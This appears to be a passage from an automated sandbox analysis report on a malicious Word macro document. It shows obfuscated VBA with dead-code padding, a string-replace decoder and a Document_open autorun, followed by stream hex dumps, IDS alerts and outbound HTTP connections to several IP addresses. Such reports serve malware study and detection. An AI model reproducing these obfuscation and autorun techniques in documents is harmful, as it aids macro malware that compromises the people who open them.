                                              Open "O:\afdxHDJBG\OOakBB\YSVJm.JNPGbSG" For Binary Access Read As #BIeAA
                                              ReDim gJLEFBFsL(1 To LOF(intGend) - 5)
                                              Get #BIeAA, , gJLEFBFsL
                                              Get #BIeAA, , gJLEFBFsL
                                              Get #BIeAA, , gJLEFBFsL
                                              Close #BIeAA
                                              lOETktD:
                                              Haq5kvro2d9z = Xrl25i0p5sd_oj40b(Tt79y87d36ripg03s)
                                                 GoTo RimyuHaBD
                                              Dim nOveD() As Byte
                                              Dim fFPBDj As Integer
                                              fFPBDj = FreeFile
                                              Open "F:\IdwCD\hmrPgFD\cRBUGEn.vHNcDFc" For Binary Access Read As #fFPBDj
                                              Open "O:\xaLnPmJ\onZFlHPHD\pjbxIFFyV.svJWEETFm" For Binary Access Read As #fFPBDj
                                              ReDim nOveD(1 To LOF(intGend) - 5)
                                              Get #fFPBDj, , nOveD
                                              Get #fFPBDj, , nOveD
                                              Get #fFPBDj, , nOveD
                                              Close #fFPBDj
                                              RimyuHaBD:
                                              Tfizx5uxnfjbxnml = Haq5kvro2d9z
                                                 GoTo VSbuEj
                                              Dim RzwvkExUI() As Byte
                                              Dim tSFvVJKHm As Integer
                                              tSFvVJKHm = FreeFile
                                              Open "F:\TtMDAecA\xaSGJIyyl\NmQTHB.LFYtzzGH" For Binary Access Read As #tSFvVJKHm
                                              Open "O:\jobmCCM\LsFeNKGF\DLsTwJcGF.EAyuxB" For Binary Access Read As #tSFvVJKHm
                                              ReDim RzwvkExUI(1 To LOF(intGend) - 5)
                                              Get #tSFvVJKHm, , RzwvkExUI
                                              Get #tSFvVJKHm, , RzwvkExUI
                                              Get #tSFvVJKHm, , RzwvkExUI
                                              Close #tSFvVJKHm
                                              VSbuEj:
                                              End Function
                                              Function Xrl25i0p5sd_oj40b(Rttd6rymyw4z)
                                              W7t8l1jd1ya = Ubnvz_721a0k0z7gn
                                                 GoTo JJjHG
                                              Dim SkWVG() As Byte
                                              Dim ksQLDZi As Integer
                                              ksQLDZi = FreeFile
                                              Open "F:\kFayEHAHH\ddvLIEC\CfRxAE.EiLcdX" For Binary Access Read As #ksQLDZi
                                              Open "O:\qklyMYNC\IkLXI\wrvzJw.AssIJ" For Binary Access Read As #ksQLDZi
                                              ReDim SkWVG(1 To LOF(intGend) - 5)
                                              Get #ksQLDZi, , SkWVG
                                              Get #ksQLDZi, , SkWVG
                                              Get #ksQLDZi, , SkWVG
                                              Close #ksQLDZi
                                              JJjHG:
                                              Xrl25i0p5sd_oj40b = Replace(Rttd6rymyw4z, "]b2[s", Zxrltp30ofw)
                                                 GoTo hSQRFSr
                                              Dim WkbcFJEAD() As Byte
                                              Dim WppWDKHVA As Integer
                                              WppWDKHVA = FreeFile
                                              Open "F:\WnCoG\HBbVaCA\fukyDw.vGjESBX" For Binary Access Read As #WppWDKHVA
                                              Open "O:\hLrrUIYmJ\REMOCDBjE\WEMaHYGD.fCCwYV" For Binary Access Read As #WppWDKHVA
                                              ReDim WkbcFJEAD(1 To LOF(intGend) - 5)
                                              Get #WppWDKHVA, , WkbcFJEAD
                                              Get #WppWDKHVA, , WkbcFJEAD
                                              Get #WppWDKHVA, , WkbcFJEAD
                                              Close #WppWDKHVA
                                              hSQRFSr:
                                              End Function
                                              VBA File Name: Ouz_y28f7ehnqn, Stream Size: 1113
                                              General
                                              Stream Path:Macros/VBA/Ouz_y28f7ehnqn
                                              VBA File Name:Ouz_y28f7ehnqn
                                              Stream Size:1113
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 06 12 10 98 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              False
                                              Private
                                              VB_Exposed
                                              Attribute
                                              VB_Creatable
                                              VB_Name
                                              Document_open()
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code
                                              Attribute VB_Name = "Ouz_y28f7ehnqn"
                                              Attribute VB_Base = "1Normal.ThisDocument"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = True
                                              Attribute VB_Customizable = True
                                              Private Sub Document_open()
                                              Nr8et74sjtle6s
                                              End Sub
                                              VBA File Name: Z5ncc5dwidbkjld, Stream Size: 702
                                              General
                                              Stream Path:Macros/VBA/Z5ncc5dwidbkjld
                                              VBA File Name:Z5ncc5dwidbkjld
                                              Stream Size:702
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 06 12 4d 00 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              Attribute
                                              VB_Name
                                              VBA Code
                                              Attribute VB_Name = "Z5ncc5dwidbkjld"

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 121
                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:121
                                              Entropy:4.36374049783
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . M i c r o s o f t O f f i c e W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.24979504615
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 576
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:576
                                              Entropy:4.29333303912
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 10 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 74 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                              Stream Path: 1Table, File Type: data, Stream Size: 6493
                                              General
                                              Stream Path:1Table
                                              File Type:data
                                              Stream Size:6493
                                              Entropy:6.028999636
                                              Base64 Encoded:True
                                              Data ASCII:f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                              Data Raw:66 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 00 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                              Stream Path: Data, File Type: data, Stream Size: 99185
                                              General
                                              Stream Path:Data
                                              File Type:data
                                              Stream Size:99185
                                              Entropy:7.38960224856
                                              Base64 Encoded:True
                                              Data ASCII:q . . . D . d . . . . . . . . . . . . . . . . . . . . . J F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . A . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . . . . . . . . . . . R . . . . . . . . . I W . . . . e . . + . " a . I . . . . . . . . . . . D . . . . . . . . F . . . . . . I W . . . . e . . + . " a . I . . . . . . .
                                              Data Raw:71 83 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 46 ef 1f 08 02 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 83 00 0b f0 46 00 00 00 bf 00 04 00 04 00 04 41 01 00 00 00 05 c1 02 00 00 00 3f 01 00 00 06 00 bf 01 00 00
                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 517
                                              General
                                              Stream Path:Macros/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:517
                                              Entropy:5.55798386141
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { B 4 0 1 A A D A - A 5 D 9 - 4 A 5 B - B 2 C F - 6 8 1 6 1 E D 3 5 F F D } " . . D o c u m e n t = O u z _ y 2 8 f 7 e h n q n / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z 5 n c c 5 d w i d b k j l d . . M o d u l e = J w q 9 b 1 l b 0 h m m 7 . . E x e N a m e 3 2 = " S 0 z x n a n c z t d " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A E A C 8 3 E 1 8 3 2 1 B F 2 5 B F 2 5 B F 2 5 B F 2 5 " . . D P B = "
                                              Data Raw:49 44 3d 22 7b 42 34 30 31 41 41 44 41 2d 41 35 44 39 2d 34 41 35 42 2d 42 32 43 46 2d 36 38 31 36 31 45 44 33 35 46 46 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4f 75 7a 5f 79 32 38 66 37 65 68 6e 71 6e 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 35 6e 63 63 35 64 77 69 64 62 6b 6a 6c 64 0d 0a 4d 6f 64 75 6c 65 3d 4a 77 71 39 62 31 6c 62 30 68 6d 6d 37 0d 0a 45
                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 137
                                              General
                                              Stream Path:Macros/PROJECTwm
                                              File Type:data
                                              Stream Size:137
                                              Entropy:3.82716267344
                                              Base64 Encoded:False
                                              Data ASCII:O u z _ y 2 8 f 7 e h n q n . O . u . z . _ . y . 2 . 8 . f . 7 . e . h . n . q . n . . . Z 5 n c c 5 d w i d b k j l d . Z . 5 . n . c . c . 5 . d . w . i . d . b . k . j . l . d . . . J w q 9 b 1 l b 0 h m m 7 . J . w . q . 9 . b . 1 . l . b . 0 . h . m . m . 7 . . . . .
                                              Data Raw:4f 75 7a 5f 79 32 38 66 37 65 68 6e 71 6e 00 4f 00 75 00 7a 00 5f 00 79 00 32 00 38 00 66 00 37 00 65 00 68 00 6e 00 71 00 6e 00 00 00 5a 35 6e 63 63 35 64 77 69 64 62 6b 6a 6c 64 00 5a 00 35 00 6e 00 63 00 63 00 35 00 64 00 77 00 69 00 64 00 62 00 6b 00 6a 00 6c 00 64 00 00 00 4a 77 71 39 62 31 6c 62 30 68 6d 6d 37 00 4a 00 77 00 71 00 39 00 62 00 31 00 6c 00 62 00 30 00 68 00 6d
                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3895
                                              General
                                              Stream Path:Macros/VBA/_VBA_PROJECT
                                              File Type:data
                                              Stream Size:3895
                                              Entropy:5.10348295591
                                              Base64 Encoded:False
                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                              Data Raw:cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                              Stream Path: Macros/VBA/dir, File Type: Apollo m68k COFF executable not stripped - version 18435, Stream Size: 667
                                              General
                                              Stream Path:Macros/VBA/dir
                                              File Type:Apollo m68k COFF executable not stripped - version 18435
                                              Stream Size:667
                                              Entropy:6.36338461124
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . t . m . . . . ! O f f i c
                                              Data Raw:01 97 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 98 a7 da 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                              Stream Path: WordDocument, File Type: data, Stream Size: 22574
                                              General
                                              Stream Path:WordDocument
                                              File Type:data
                                              Stream Size:22574
                                              Entropy:3.92066931997
                                              Base64 Encoded:False
                                              Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . S . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 0d 53 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 58 00 00 ce 90 01 00 ce 90 01 00 0d 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              01/07/21-11:47:08.799892ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                              01/07/21-11:47:12.031373ICMP399ICMP Destination Unreachable Host Unreachable10.84.1.70192.168.2.22
                                              01/07/21-11:47:15.029345ICMP399ICMP Destination Unreachable Host Unreachable10.84.1.70192.168.2.22
                                              01/07/21-11:47:21.039486ICMP399ICMP Destination Unreachable Host Unreachable10.84.1.70192.168.2.22
                                              01/07/21-11:47:32.773394ICMP399ICMP Destination Unreachable Host Unreachable58.97.195.135192.168.2.22
                                              01/07/21-11:47:32.773434ICMP399ICMP Destination Unreachable Host Unreachable58.97.195.135192.168.2.22
                                              01/07/21-11:47:38.088826ICMP399ICMP Destination Unreachable Host Unreachable58.97.195.135192.168.2.22
                                              01/07/21-11:47:38.088841ICMP399ICMP Destination Unreachable Host Unreachable58.97.195.135192.168.2.22
                                              01/07/21-11:47:39.372826ICMP399ICMP Destination Unreachable Host Unreachable58.97.195.135192.168.2.22
                                              01/07/21-11:47:42.622670ICMP399ICMP Destination Unreachable Host Unreachable58.97.195.135192.168.2.22
                                              01/07/21-11:47:58.632181ICMP399ICMP Destination Unreachable Host Unreachable58.97.195.135192.168.2.22
                                              01/07/21-11:48:13.482004ICMP399ICMP Destination Unreachable Host Unreachable58.97.195.135192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 7, 2021 11:47:05.812747955 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:05.962234974 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:05.962523937 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:05.965092897 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:06.114531994 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.069713116 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.069770098 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.069837093 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.069942951 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.072895050 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.072925091 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.073014975 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.073151112 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.073260069 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.073304892 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.073339939 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.073350906 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.073368073 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.073400021 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.219362974 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.219434977 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.219476938 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.219515085 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.219651937 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222326994 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222367048 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222455978 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222476006 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222513914 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222568035 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222582102 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222615004 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222693920 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222701073 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222738981 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222774982 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222819090 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222827911 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222872019 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222893000 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222918034 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222955942 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222980976 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.223005056 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.223062038 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.369332075 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369431973 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369478941 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369522095 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369563103 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.369580030 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369581938 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.369623899 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369662046 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369683981 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.369712114 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369769096 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.372085094 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372127056 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372164965 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372198105 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.372215986 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372256994 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372288942 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.372306108 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372368097 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.372442961 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.578686953 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:08.776680946 CET4916680192.168.2.22193.187.117.26
                                              Jan 7, 2021 11:47:11.775449038 CET4916680192.168.2.22193.187.117.26
                                              Jan 7, 2021 11:47:12.223404884 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:12.223617077 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:17.782033920 CET4916680192.168.2.22193.187.117.26
                                              Jan 7, 2021 11:47:29.989146948 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:30.138712883 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:30.138955116 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:30.139081001 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:30.288525105 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352452040 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352494955 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352545023 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352561951 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.352581978 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352615118 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352634907 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.352646112 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352674007 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352686882 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.354415894 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.354450941 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.354563951 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.382409096 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.382546902 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502430916 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502476931 CET804916770.32.23.58192.168.2.22
